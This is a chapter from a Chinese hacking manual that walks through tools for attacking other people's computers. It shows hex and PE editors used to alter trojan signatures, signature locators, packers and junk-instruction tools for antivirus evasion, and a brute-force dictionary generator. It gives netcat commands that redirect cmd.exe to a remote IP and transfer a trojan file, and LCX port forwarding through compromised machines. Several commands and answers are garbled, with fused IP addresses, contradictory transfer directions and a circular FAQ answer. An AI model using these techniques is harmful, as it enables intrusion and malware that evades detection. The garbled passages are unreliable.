第1章 黑客必备小工具
重点提示:
◆ 文本编辑工具
◆ 免杀辅助工具
◆ 破解辅助工具
◆ 其他工具
本章主要介绍黑客必备的各种小工具,例如文本编辑工具、免杀辅助工具、破解辅助工具以及其他一些工具,有助于读者对这些工具有一个比较全面的了解,并学会使用这些工具。
在黑客试图攻击他人计算机并进行一系列破坏性操作时,如果要实现攻击目的,往往会借助各种各样的工具,如文本编辑工具、免杀辅助工具、破解辅助工具等。
1.1 文本编辑工具
在对文件进行修改时,经常会用到文本编辑工具,如UltraEdit编辑器、WinHex和PE文件编辑工具PEditor。黑客通常借助于这些工具来修改木马病毒的特征码,以避开杀毒软件。
1.1.1 UltraEdit编辑器
UltraEdit是一套功能强大的文本编辑器,该工具可以编辑文本、十六进制数、ASCII码等,甚至可取代记事本,该编辑器中内建英文单字检查、C++及VB指令,可同时编辑多个文件。该软件又附有HTML标签颜色显示、搜寻替换及无限制还原功能,可修改EXE或DLL文件。
该工具的具体使用步骤如下。
步骤01 下载并安装UltraEdit,双击该工具的快捷图标,即可打开“文件关联”对话框,在其中可以看到UltraEdit支持多种文件格式,例如*.txt、*.doc、*.Bat、*.ini、(C语言源程序)*.c和*.cpp、头文件*.h和*.hpp、HTML语言*.html和*.htm、Java语言*.java和*.jav等,这些文件类型基本覆盖了所有的常见文件类型,如图1-1所示。
图1-1 “文件关联”对话框
步骤02 在其中勾选相应的复选框,单击“确定”按钮,即可打开“UltraEdit”主窗口,在“UltraEdit”工具中可以查看各种应用软件的十六进制代码,如图1-2所示。
图1-2 “UltraEdit”主窗口
步骤03 选择“文件”→“打开”菜单项,即可打开“打开”对话框,如图1-3所示。
图1-3 “打开”对话框
步骤04 在其中选择相应的应用程序,单击“打开”按钮,即可在“UltraEdit”主窗口中看到该应用程序对应的十六进制编码,如图1-4所示。
图1-4 查看应用程序对应的十六进制编码
步骤05 UltraEdit-32支持多文件的查找替换,如果想把打开的几个文件中的“/index.htm”全部替换为“../index.htm”,在“UltraEdit”主窗口中选择“搜索”→“替换”选项,即可打开“替换”对话框,在其中分别输入要查找的词和要替换的词,如图1-5所示。单击“全部替换”按钮,即可进行替换操作。
图1-5 “替换”对话框
步骤06 在UltraEdit编辑工具中还可以插入或删除十六进制数据。在“UltraEdit”主窗口中选择“编辑”→“十六进制功能”→“十六进制插入/删除”菜单项,即可打开“十六进制插入/删除”对话框,如图1-6所示。
图1-6 “十六进制插入/删除”对话框
步骤07 在“UltraEdit”主窗口中选择“插入”→“在每一个增量处字符串”菜单项,即可打开“用指定增量插入字符串”对话框,在其中设置要插入的字符、文件偏移开始点等属性,如图1-7所示。单击“确定”按钮,即可添加指定的字符串。
图1-7 “用指定增量插入字符串”对话框
步骤08 还可以让UltraEdit软件自己打开指定类型的文件,其具体的添加方法为:在“UltraEdit”主窗口中选择“高级”→“配置”菜单项,即可打开“配置”对话框,在“文件类型”选项卡下就可以添加新的文件类型,如图1-8所示。
图1-8 “配置”对话框
步骤09 如果在“UltraEdit”主窗口中选择“文件”→“转换”菜单项,则可展开UltraEdit的文本格式转换菜单,在其中进行UNIX/MAC与DOS、EBCDIC与ASCII、OEM与ANSI之间文本的相互转换,如图1-9所示。
图1-9 “转换”菜单
步骤10 UltraEdit软件支持在Windows系统里安装的所有字体,其中包括中文Windows和其他外挂字体。如果要选择显示字体,在“UltraEdit”主窗口中选择“视图”→“设置字体”菜单项,即可打开“字体”对话框,如图1-10所示。
图1-10 “字体”对话框
步骤11 在UltraEdit软件中还可以直接调用DOS和Windows命令,在“UltraEdit”主窗口中选择“高级”→“DOS命令”菜单项或按“F9”快捷按键,即可打开“DOS命令”对话框,如图1-11所示。
图1-11 “Dos命令”对话框
步骤12 在“命令”文本框中输入DOS命令,如dir、 ping等,单击“确定”按钮,即可在“UltraEdit”主窗口的编辑区中查看该命令的具体执行结果,利用这项功能可以截取DOS窗口运行的文本信息,如图1-12所示。
图1-12 Dos命令的执行结果
步骤13 如果想运行Windows程序,则在“UltraEdit”主窗口中选择“高级”→“运行Windows程序”菜单项或按下“F10”键,即可打开“运行Windows程序”对话框,如图1-13所示。
图1-13 “运行Windows程序”对话框
步骤14 在“命令”文本框中输入调用Windows应用程序(如cmd),单击“确定”按钮,即可打开“命令提示符”窗口,在其中看到UltraEdit软件的安装路径,如图1-14所示。
图1-14 “命令提示符”窗口
步骤15 在UltraEdit工具还可以编辑和使用宏,在使用宏之前需要先定义宏。在“UltraEdit”主窗口中选择“宏”→“录制”菜单项,即可打开“宏定义”对话框,如图1-15所示。在其中输入宏的名称和热键后,单击“确定”按钮,即可录制宏。
图1-15 “宏定义”对话框
步骤16 如果想在UltraEdit工具中插入并使用已经存在的脚本文件,则在“UltraEdit”主窗口中选择“脚本”→“脚本”菜单项,即可打开“脚本”对话框,在其中进行添加、编辑、删除脚本操作,如图1-16所示。
图1-16 “脚本”对话框
步骤17 在编辑和使用脚本之前,同样需要先添加脚本文件。在“脚本”对话框中单击“添加”按钮,即可打开“打开”对话框,如图1-17所示。
图1-17 “打开”对话框
步骤18 在其中选择相应的脚本文件(一般是.js文件),单击“打开”按钮,即可在“脚本”对话框中看到添加的脚本文件,如图1-18所示。
图1-18 添加的脚本文件
步骤19 单击“确定”按钮,返回到“UltraEdit”主窗口中的“脚本列表”窗口中,即可看到刚添加的脚本文件,如图1-19所示。
图1-19 在“脚本列表”窗口中查看添加的脚本文件
步骤20 利用UltraEdit软件还可以对应用程序进行加密和解密操作。在“UltraEdit”主窗口中选择“文件”→“加密”→“加密文件”菜单项,即可打开“加密文件”对话框,在“密码”和“确认密码”文本框中分别输入要设置的密码,如图1-20所示。
图1-20 “加密文件”对话框
步骤21 单击“确定”按钮,即可打开“加密-删除文件”对话框,如图1-21所示。
图1-21 “加密-删除文件”对话框
步骤22 如果不想删除应用程序源文件,则单击“否”按钮,即可进行加密操作。待成功加密后,即可看到“加密完成”提示框,如图1-22所示。
图1-22 “加密完成”提示框
步骤23 同理如果想解密文件,则在“UltraEdit”主窗口中选择“文件”→“加密”→“解密文件”菜单项,即可打开“解密文件”对话框,如图1-23所示。
图1-23 “解密文件”对话框
步骤24 在其中选择要解密的文件并输入设置的密码,单击“确定”按钮,即可进行解密操作。待成功解密后,即可看到“解密完成”提示框,如图1-24所示。
图1-24 “解密完成”提示框
1.1.2 WinHex编辑器
WinHex是一款以通用十六进制编辑器为核心,专门用于处理数据恢复、低级数据处理、IT安全性以及各种日常紧急情况的高级编辑工具。该工具的主要作用是分析和比较文件、磁盘克隆、数据擦除、搜索和替换等,利用该工具可以进行检查和修复各种文件、恢复删除文件、硬盘损坏造成的数据丢失等操作。下面将介绍如何配置和使用WinHex编辑器。
1. 配置WinHex
为了充分地利用WinHex工具的强大功能,在使用该工具之前还需要对其进行一些简单的配置。具体的操作步骤如下。
步骤01 下载并解压缩WinHex文件后,双击WinHex.exe可执行文件,即可打开“WinHex”主窗口,如图1-25所示。
图1-25 “WinHex”主窗口
步骤02 选择“Options(选项)”→“General(常规)”菜单项,即可打开“General Options(常规选项)”对话框,在其中可以设置临时文件的文件夹的存放位置,如:C:\temp,并勾选“(Hexadecimal Offsets)十六进制偏移量”复选框,将虚拟地址和偏移地址都设置为十六进制的,如图1-26所示。
步骤03 选择“Options(选项)”→“Edit Mode(编辑模式)”菜单项,即可打开“Select Mode(选择模式)”对话框,如图1-27 所示。由于WinHex默认是写保护方式的,这里将编辑模式修改为“Default Edit Mode(=deitale)(默认的编辑模式(=可编写))”选项。
步骤04 选择“Options(选项)”→“Data Interpreter Options(数据解析器选项)”菜单项,即可打开“Data Interpreter Options(数据解析器选项)”对话框,在其中设置数据解析器各个属性,如图1-28所示。
图1-26 “常规选项”对话框
图1-27 “选择模式”对话框
图1-28 “数据解析器”对话框
2. WinHex的使用
WinHex的主要功能是以十六进制方式编辑和修改机器码,另外还有编辑文本、文件比较以及内存编辑等功能。该工具的具体使用步骤如下。
步骤01 在“WinHex”主窗口中选择“File”→“Open”菜单项,即可打开“Open Files(打开文件)”对话框,在其中选择需要打开的应用程序,如图1-29所示。
图1-29 “Open Files(打开文件)”对话框
步骤02 单击“打开”按钮,即可在“WinHex”主窗口中看到该文件的十六进制代码,如图1-30所示。
图1-30 在“WinHex”主窗口中查看应用程序对应的十六进制代码
步骤03 在WinHex可以定位到某个偏移地址处,在“WinHex”主窗口中选择“Position(位置)”→“Go To Offset(转到偏移量)”菜单项,即可打开“Go To Offset(转到偏移量)”对话框,在“New position(新位置)”文本框中输入“0000050”,如图1-31所示。
图1-31 “Go To Offset(转到偏移量)”对话框
步骤04 单击“OK”按钮,即可将光标转到相应的地址处,即蓝色显示的代码处,如图1-32所示。
步骤05 使用WinHex还可以搜索出一些程序内的字符串,且可以对它们进行编辑。在“WinHex”主窗口中选择“Search(搜索)”→“Find Text(查找文本)”命令,即可打开“Find Text(查找文本)”对话框,在其中输入需要修改的字符串,如“run in DOS mode”,将搜索方式设置为“ASCII/Code page”选项,如图1-33所示。
图1-32 定位到设置的偏移量处
图1-33 “查找文本”对话框
步骤06 单击“OK”按钮,即可看到已经跳转到要搜索字符串的地址处,如图1-34所示。在窗口右侧文本区域中进行字符串的修改,单击工具栏上的“保存”按钮,即可保存。
图1-34 查找到的字符串
步骤07 利用WinHex软件还可以对文件进行连接、分割、合并、不可逆转删除和比较等操作。在解密时经常用到的功能是比较,即通过比较解密前后的文件看出解密者对程序中的哪些代码做了修改,最后生成一个文本方式差别报告。在“Winhex”主窗口中选择“Tools(工具)”→“Files Tools(文件工具)”→“Compare(比较)”菜单项,即可打开“Compare File/Disks(比较文件/硬盘)”对话框,如图1-35所示。
图1-35 “Compare File/D isks”对话框
步骤08 单击“2nd file”文本框后面的“浏览”按钮
,即可打开“Start Center(启动中心)”对话框,如图1-36所示。
图1-36 “Start Center(启动中心)”对话框
步骤09 单击“Open File(打开文件)”按钮,在“Open Files(打开文件)”对话框中选择需要比较的文件,单击“打开”按钮,即可返回到“启动中心”对话框。单击“OK”按钮返回到“Compare File/Diske比较文件/硬盘”对话框,即可看到选择的需要比较的文件,如图1-37所示。
图1-37 选择的比较文件
步骤10 单击“Save Reports(保存报告)”文本框后面的“浏览”按钮,即可打开“Save Reports As(保存报告为)”对话框,在其中设置报告的保存位置和名称,如图1-38所示。
图1-38 “保存报告为”对话框
步骤11 单击“保存”按钮,即可返回到“Compare File/Diske(比较文件/硬盘)”对话框,在其中看到报告的具体保存位置,如图1-39所示。单击“OK”按钮,即可打开可以用记事本程序查看报告提示框,如图1-40所示。
图1-39 报告的具体保存位置
图1-40 报告提示框
步骤12 当系统完成文件的比较之后,将会产生一个文本文件,从中可以看到不同代码处的偏移地址、代码内容和差别总数等信息,如图1-41所示。
图1-41 查看比较文件生成的报告
步骤13 在Winhex软件中还可以将应用程序分割为指定大小的文件。在“Winhex”主窗口中选择“Tools(工具)”→“Files Tools(文件工具)”→“Split(分割)”菜单项,即可打开“Split File(分割文件)”对话框,在其中选择需要分割的文件,如图1-42所示。
图1-42 “Split File(分割文件)”对话框
步骤14 单击“Split(分割)”按钮,即可打开“Desired file size(定义文件大小)”对话框,在其中设置文件的大小,如图1-43所示。
图1-43 “Desired file size(定义文件大小)”对话框
步骤15 单击“OK”按钮,即可打开“Destination File(目标文件)”对话框,在其中设置目标文件的保存位置,如图1-44所示。单击“保存”按钮,即可进行文件分割。
图1-44 “Destination File(目标文件)”对话框
1.1.3 PE文件编辑工具PEditor
PEditor是一款PE文件编辑工具,有转存进程、在SoftICE中插入中断、编辑PE文件的导入表、节表、重建校验和重建程序等功能。与其他PE编辑工具相比,PEditor可把所有的功能都集中在主窗口中,从而方便修改PE文件。使用PEditor编辑PE文件的操作步骤如下。
步骤01 下载并运行“PEditor 1.7汉化版”程序,即可打开“PEditor 1.7”主窗口,如图1-45所示。单击“浏览”按钮,即可打开“选择你要查看的文件”对话框,如图1-46所示。
图1-45 “PEditor 1.7”主窗口
图1-46 “选择你要查看的文件”对话框
步骤02 在选择要查看特征码的文件后,单击“打开”按钮,即可在“PEditor 1.7”主窗口中看到该文件的各种特征码信息,如图1-47所示。在“入口点”文本框中将其特征码修改为“000021A0”,如图1-48所示。该种方法可以使木马程序避开一般的杀毒软件。
图1-47 检测所选文件的各种特征码信息
图1-48 修改入口点特征码
步骤03 单击“应用更改”按钮,即可打开“此文件更新成功”提示框,如图1-49所示。单击“确定”按钮,即可完成修改入口点的防特征码免杀设置。
图1-49 “此文件更新成功”提示框
步骤04 在“PEditor 1.7”主窗口中单击“分割节”按钮,即可打开“4区段及PE头成功转存”提示框,如图1-50所示。单击“确定”按钮,即可转存4区段和PE头文件。
图1-50 “4区段及PE头成功转存”提示框
步骤05 在“PEditor 1.7”主窗口中单击“调试器中断”按钮,即可打开“调试器中中断”提示框,在“虚拟地址”文本框中输入虚拟地址,如图1-51所示。
图1-51 “调试器中中断”提示框
步骤06 单击“运行”按钮,即可打开“NeoTrace Pro 3.25 Trial遇到问题需要关闭”提示框,如图1-52所示。单击“关闭”按钮,即可中断NeoTrace Pro 3.25 Trial程序。
图1-52 “遇到问题需要关闭”提示框
步骤07 在“PEditor 1.7”主窗口中单击“FLC”按钮,即可打开“文件地址计算器”提示框,在其中选择“相对虚拟地址”单选项并输入相对虚拟地址,如图1-53所示。
图1-53 “文件地址计算器”提示框
步骤08 单击“执行”按钮,即可计算出输入的“相对虚拟地址”对应的虚拟地址、十六进制偏移、十进制偏移以及字节内容,如图1-54所示。
图1-54 计算相对虚拟地址对应的各项值
步骤09 在“PEditor 1.7”主窗口中单击“校验和”按钮,即可打开“校验和修正器”提示框,在其中输入当前校验和与修正校验和,如图1-55所示。单击“修正”按钮,即可打开“校验和更新成功”提示框,如图1-56所示。
图1-55 “校验和修正器”提示框
图1-56 “校验和更新成功”提示框
步骤10 在“PEditor 1.7”主窗口中单击“重建器”按钮,即可打开“重建器”提示框,在其中勾选相应的复选框,如图1-57所示。单击“执行”按钮,即可重建打开的应用程序,如图1-58所示。
图1-57 “重建器”提示框
图1-58 重建打开的应用程序
1.2 免杀辅助工具
在黑客进行入侵之前,往往使用免杀辅助工具对其木马程序进行免杀处理,这样才可以成功避开目标主机杀毒软件。常见的免杀辅助工具有MYCLL定位器、OC偏移转换工具等。
1.2.1 MYCLL定位器
当杀毒软件遇到新的病毒时,就会从该病毒程序中截取一段二进制程序代码(特征码),来当作判断是否是病毒,所以更改特征码就成为免杀最常见,也是比较有效的方法。在修改文件特征码之前,往往需要先对特征码进行定位,而定位特征码通常有手工定位和自动定位两种方法。在一般情况下,先使用手工定位确定大范围,再使用自动定位确定小范围,MYCLL就是一款非常经典的特征码定位软件。
使用MYCLL特征码定位器定位特征码的具体操作步骤如下。
步骤01 下载并运行“MYCLL特征码定位器V2.1”软件,即可打开“MYCLL Ver2.1”主窗口,在其中可以查看应用软件的特征码,如图1-59所示。
图1-59 “MYCLL Ver2.1”主窗口
步骤02 在“MYCLL Ver2.1”主窗口中单击右边的“文件”按钮,即可打开“打开”对话框,在其中选择需要定位特征码的文件,如图1-60所示。
图1-60 “打开”对话框
步骤03 单击“打开”按钮,即可在“MYCLL Ver2.1”主窗口中下半部分看到该文件包含的PE文件信息,如图1-61所示。
图1-61 查看文件包含的PE文件信息
步骤04 单击“特征区间”按钮,即可打开“填充/特征码 区间设定”对话框,如图1-62所示。在“开始位置”和“结束位置”文本框中分别输入开始位置和结束位置对应的特征码后,单击“添加已确定的特征码范围”按钮,即可添加该特征码区间。
图1-62 “填充/特征码区间设定”对话框
步骤05 单击“MYCLL Ver2.1”主窗口中的“生成”按钮,即可打开“程序将清除目录中的所有文件”提示框,如图1-63所示。
图1-63 程序将清除目录中的所有文件
步骤06 单击“Yes”按钮,即可打开“请对生成目录进行杀毒”提示框,如图1-64所示。单击“OK”按钮,即可在“MYCLL Ver2.1”主窗口中看到生成文件的具体路径,如图1-65所示。
图1-64 “请对生成目录进行杀毒”提示框
图1-65 查看生成文件的具体路径
步骤07 单击“二次处理”按钮,即可在“MYCLL Ver2.1”主窗口中看到复合特征码定位结果,如图1-66所示。
图1-66 查看复合特征码定位结果
步骤08 根据定位的结果在专门修改特征码工具中打开该木马文件,将特征码所在的位置替换为0。再使用杀毒软件进行杀毒,如果没有报病毒就表明定位的结果是正确的,同时也完成修改特征码。
1.2.2 OC偏移量转换器
OC偏移量转换器是一款偏移量转换工具,利用该工具可以将文件偏移量转换为内存地址,也可以将内存地址转换为文件偏移量。该工具的具体使用步骤如下。
步骤01 下载并运行“OC偏移量转换器”软件,即可打开“偏移量转换器”主窗口,如图1-67所示。单击“打开需要进行转偏移量转换的文件”文本框后面的“浏览”按钮,即可打开“打开”对话框,如图1-68所示。
图1-67 “偏移量转换器”主窗口
图1-68 “打开”对话框
步骤02 在其中选择需要转换偏移量文件,单击“打开”按钮,即可在“偏移量转换器”主窗口中看到所选择的文件,如图1-69所示。在“文件偏移”文本框中输入文件偏移地址,单击“转换”按钮
,即可将该文件偏移地址转换为“内存地址”,如图1-70所示。
图1-69 查看所选择的文件
图1-70 将文件偏移地址转换为内存地址
步骤03 在OC偏移量转换器中还可以将内存地址转换为文件偏移地址。在“偏移量转换器”主窗口中的“内存地址”文本框中输入要转换的内存地址,如图1-71所示。单击“转换”按钮
,即可将该内存地址转换为对应的文件偏移地址,如图1-72所示。
图1-71 入要转换的内存地址
图1-72 将该内存地址转换为文件偏移地址
1.2.3 ASPack加壳工具
ASPack是一款专门对WIN32可执行程序进行压缩的工具,而且压缩后程序能正常运行。另外即使将ASPack从硬盘中删除,曾经压缩过的文件仍可正常使用。
利用ASPack对木马加壳进行的具体操作步骤如下。
步骤01 下载并运行“ASPack2.12”软件,即可打开“ASPack 2.12”主窗口,如图1-73所示。在“选项”选项卡中勾选“压缩还原”、“装载后自动运行”以及“使用Windows DLL loader”等复选框,如图1-74所示。
图1-73 “ASPack 2.12”主窗口
图1-74 “选项”选项卡
步骤02 选择“打开文件”选项卡,单击“打开”按钮,即可打开“选择文件 压缩”对话框,在其中选择需要加壳的文件,如图1-75所示。
图1-75 “选择文件压缩”对话框
步骤03 单击“打开”按钮,即可开始进行压缩,如图1-76 所示。在“压缩”选项卡中可进行压缩、测试操作,并在完成之后生成加壳后的文件。
图1-76 进行压缩
1.2.4 超级加花器
“超级加花器”是一款加花指令工具,该工具支持附加数据自动检测,对于存在附加数据的EXE、DLL等程序加花后仍可执行。使用“超级加花器”工具加花指令的具体操作如下。
步骤01 下载并运行“超级加花器V1.8”工具,即可打开“超级加花器”主窗口,如图1-77所示。直接拖动需要加花指令的程序到“文件名”文本框中并释放鼠标;在“花指令”下拉列表中选择相应的花指令,如图1-78所示。
图1-77 “超级加花器”窗口
图1-78 添加程序并选择花指令
步骤02 单击“加花”按钮,即可看到“添加成功”提示框,如图1-79 所示。单击“确定”按钮,即可完成加花操作。
图1-79 “添加成功”提示框
步骤03 在“超级加花器”工具中还可以添加自定义的花指令。在“花指令名称”和“花指令内容”文本框中分别输入花指令的名称和内容,如图1-80所示。
图1-80 输入花指令名称和内容
步骤04 单击“保存”按钮,即可看到“添加花指令成功,并加载成功”提示框,如图1-81所示。单击“确定”按钮,即可成功添加该花指令。
图1-81 “添加花指令成功并加载成功”提示框
1.3 入侵辅助工具
黑客在入侵过程中,往往会使用到一些辅助工具,如在入侵注册表时使用Regsnap注册表快照工具获得目标主机注册表和系统的信息;而在进行密码破解时则使用字典制作工具制作字典,从而实现暴力破解密码目的。
1.3.1 RegSnap注册表快照工具
RegSnap是一个优秀的注册表快照工具,可以详细地报告注册表及其他与系统有关项目的修改变化情况,且其报告结果既可以纯文本方式,也可以html网页方式显示。除报告系统注册表修改信息外,RegSnap还可以报告系统的其他情况,如Windows的系统目录和系统的system子目录下文件的变化情况;Windows的系统配置文件win.ini和system.ini的变化情况;以及自动批处理文件是否被修改过等。该工具的具体使用步骤如下。
步骤01 下载并安装RegSnap软件后,选择“开始”→“程序”→“RegSnap”→“RegSnap”菜单项,即可打开“regsnap”主窗口,如图1-82所示。
图1-82 “regsnap”主窗口
步骤02 选择“文件”→“新建”菜单项或单击工具栏中的
按钮,即可打开“保存快照”对话框,如图1-83所示。在其中看到有三种快照方式,各种快照的作用如下。
图1-83 “保存快照”对话框
● 制作完整的快照:除记录注册表的数据外,还可记录系统目录、系统子目录、系统配置文件、系统自动批处理文件及引导文件的情况等信息,默认选中该选项。
● 仅注册表:该选项仅对注册后的用户开放,主要是选择记录局域网上某台计算机的注册表情况。
● 远程PC的连接:记录远程计算机注册表的数据,但是只适用于RegSnap专业版。
注意
“保存动态数据库的版本信息”复选框的作用还可以是记录每个键值及DLL文件的变动情况。
步骤03 在其中选择“生成所有项目的快照”单选项,单击“确定”按钮,即可对系统注册表进行快照,同时显示具体照相进度情况,向用户报告已经记录了多少个键值,如图1-84所示。
图1-84 进行快照
步骤04 在照相完毕后,即可看到“注册表快照”信息提示框,在其中看到各种快照列表的具体保存位置,如图1-85所示。
图1-85 “注册表快照”信息提示框
步骤05 在RegSnap工具中还可以对比两个不同的快照,单击工具栏上的“比较”
按钮,即可打开“比较快照”对话框,如图1-86所示。单击“第一个快照”文本框后面的“浏览”按钮
,即可打开“打开”对话框,如图1-87所示。
图1-86 “比较快照”对话框
图1-87 “打开”对话框
步骤06 在其中选择相应的应用程序,单击“打开”按钮,即可在“比较快照”对话框中看到所选择的快照文件,如图1-88所示。
图1-88 选择的快照文件
步骤07 采用同样方法选择第二个快照文件后,单击“确定”按钮,即可将这两个快照文件进行比较,具体比较结果如图1-89所示。通过比较快照文件,可以掌握注册表变动情况。
图1-89 快照文件比较结果
步骤08 在“regsnap”主窗口中选择“工具”→“快照”菜单项,即可打开“完成注册表快照”对话框,在其中可看到注册表中各个项目的统计信息,如图1-90所示。
图1-90 “完整注册表快照”对话框
步骤09 在“regsnap”主窗口中选择“工具”→“编辑快照注释”菜单项,即可打开“快照注释”对话框,在其中输入快照注释,如图1-91所示。单击“确定”按钮,即可为该快照文件添加注释。
图1-91 “快照注释”对话框
步骤10 在“regsnap”主窗口中选择“工具”→“重置”菜单项,即可打开“你确定吗”对话框,如图1-92所示。单击“是”按钮,即可重置regsnap程序。
图1-92 “你确定吗”对话框
1.3.2 字典制作工具
密码暴力破解虽然是黑客攻击比较基本的一项技术,但要成功破解密码并非那么简单。破解的成功率取决于多方面的因素,例如字典的制作,工具的使用等。目前可以用来制作字典的工具很多,如万能钥匙字典文件制作工具、易优超级字典生成器以及流光自带的字典制作工具等。这里以使用易优超级字典生成器为例介绍黑客字典的具体制作方法。
使用易优超级字典生成字典文件的具体操作步骤如下。
步骤01 下载并运行“易优超级字典生成器”工具,即可打开“易优软件-超级字典生成器”主窗口,在其中可以看到易优超级字典生成器的主要功能,如图1-93所示。
图1-93 “易优软件-超级字典生成器”主窗口
步骤02 选择“基本字符”选项卡,在其中选择字典文件需要数字、字母以及其他字符,如图1-94所示。
图1-94 “基本字符”选项卡
步骤03 在“生日”选项卡中设置生日的范围以及显示模式等属性,如图1-95所示。
图1-95 “生日”选项卡
步骤04 选择“生成字典”选项卡,通过单击“浏览”按钮设置要生成字典文件的保存位置,如图1-96所示。
图1-96 “生成字典”选项卡
步骤05 在设置完“密码位数”属性后,单击“生成字典”按钮,即可看到“是否要生成字典文件”提示框,如图1-97所示。单击“确定”按钮,即可开始生成字典文件,待完成后将会出现一个“字典制作完成”提示框,如图1-98所示。
图1-97 “是否要生成字典文件”提示框
图1-98 “字典制作完成”提示框
1.4 其他工具
随着网络的发展,网络安全也开始变得越来越重要,黑客技术也是发展迅速,因此黑客工具也开始蓬勃发展。在本节将介绍黑客界的瑞士军刀、端口转发工具以及IP隐藏功能等几种黑客常用的小工具。
1.4.1 黑客界的瑞士军刀
NC(Netcat)因为其体积小巧,功能却相当强大,所以被誉为是黑客界的瑞士军刀。黑客入侵前的信息刺探,入侵时的Shell获取,入侵后的后门制作,都可以通过NC来完成。下面将详细讲述NC的一些常见用途。
1. 瑞士军刀NC简介
NC是一款命令运行下的工具,只能在“命令提示符”窗口中运行,虽然现在有了图形化的NC,但功能上还是不如“命令提示符”窗口下的NC工具。
在“命令提示符”窗口中使用NC主要有如下4种命令格式。
(1)扫描端口命令
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
其中各个参数的具体作用如下。
● -z:将输入输出关掉,在扫描时使用
● -u:这个命令的作用仍然是扫描端口,只是用来扫UDP端口
(2)监听端口命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
其中各个参数的具体作用如下。
● -l:监听端口,监听入站信息;
● -p:后跟本地端口号;
● -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息。
(3)程序定向命令
nc -l -p port -t -e cmd.exe
本地计算机: nc -l -p port或nc -l -v -p port
远程计算机机:nc -e cmd.exe ip port
其中各个参数的具体作用如下。
● -l、-p两个参数已经解释过了
● -e:作用就是程序定向
● -t:以telnet的形式来应答
(4)传送文件命令
本地计算机:nc -v -n ip port < x:\svr.exe
远程计算机:nc -v -l -p port > y:\svr.exe
其中-n参数用于指定数字的IP地址,这里两个命令结合起来是用来传送文件的。
2. 瑞士军刀NC的应用
从上面的命令中可以看出利用瑞士军刀NC可以实现扫描和监听端口、程序定向以及传送文件等。该工具的具体使用步骤如下。
步骤01 打开“命令提示符”窗口并进入“nc.exe”文件所在的文件夹后,在其中运行探测端口信息的命令“nc -vv -w 5192.168.0.99 1-80”,即可看到192.168.0.1这台主机上从80到1之间开放的端口,如图1-99所示。
图1-99 使用nc扫描端口
步骤02 在“命令提示符”窗口中运行“nc -vv -l -p 21”命令,即可开始监听本地计算机中的21端口,如图1-100所示。
图1-100 监听本地计算机中的21端口
步骤03 在本地计算机的“命令提示符”窗口中运行“nc -v -l -p 21 > c:\muma.exe”命令,即可将“muma.exe”上传到服务器上,如图1-101所示。
图1-101 在本地计算机中上传文件
注意
其实传送文件就是利用了提交数据包的原理,只不过一个是被动接收,一个是主动接收。本机就可以将muma.exe通过21端口发送出去,而服务器则会开放21端口接收muma.exe,且在c盘根目录下创建muma.exe。
步骤04 在远程计算机的“命令提示符”窗口中运行“nc -v -n 192.168.0.13 21 <c:\muma.exe”命令,即可接收muma.exe并将其存放在C盘根目录下,如图1-102所示。
图1-102 远程计算机接收文件
1.4.2 端口转发工具LCX
LCX.exe是端口转发工具,相当于内网肉鸡上运行的服务端。使用LCX进行端口转发的具体操作步骤如下。
步骤01 在“命令提示符”窗口中运行“lcx.exe -listen 21 80”命令,即可监听21端口并转发到80端口,如图1-103所示。
图1-103 监听21端口并转发到80端口
步骤02 在公网肉鸡中的“命令提示符”窗口中运行“lcx -slave 192.168.0.23 21192.168.0.85 80”命令,即可把远程端口80转发到内网肉鸡端口中,如图1-104所示。
图1-104 远程端口80转发到内网肉鸡端口
步骤03 在内网肉鸡中的“命令提示符”窗口中运行“lcx -tran 21127.0.0.1 80”命令,即可进入连接公网肉鸡并进行端口转发,如图1-105所示。当与公网建立连接并成功端口转发后,即可看到公网肉鸡的各种信息,如图1-106所示。
图1-105 输入连接公网肉鸡命令
图1-106 端口转发成功
1.5 专家课堂(常见问题与解答)
点拨1:在使用WinHEX工具进行编辑程序后并保存文件时,为什么会提示用户“错误发生在写入‘C:\DOCUME~1\ADMINI~1.000\LOCACS~1\Temp\xxx.txt’,请确认文件夹存在和文件未被写保护”?
解答:出现这种现象的原因在于,修改后的文件保存路径和映射备份文件不在同一文件中。具体解决办法是在“WinHEX”主窗口中选择“选项”→“常规”菜单项,在“General Options(常规选项)”对话框中把临时文件或文件夹等设置为一个常用的临时目录(如C:\temp),再勾选16进制偏移量复选框,这样看到的虚拟地址和偏移地址都是16进制的。设置完毕后单击“确定”按钮,再重新启动WinHEX工具即可。
点拨2:在使用LCX端口转发工具时,为什么会出现与公网肉鸡建立连接的现象?
解答:之所以会出现这种情况,其原因在于本地计算机或公网肉鸡没有开启3389端口,因此在使用LCX端口转发工具时,往往会出现与公网肉鸡建立连接的现象。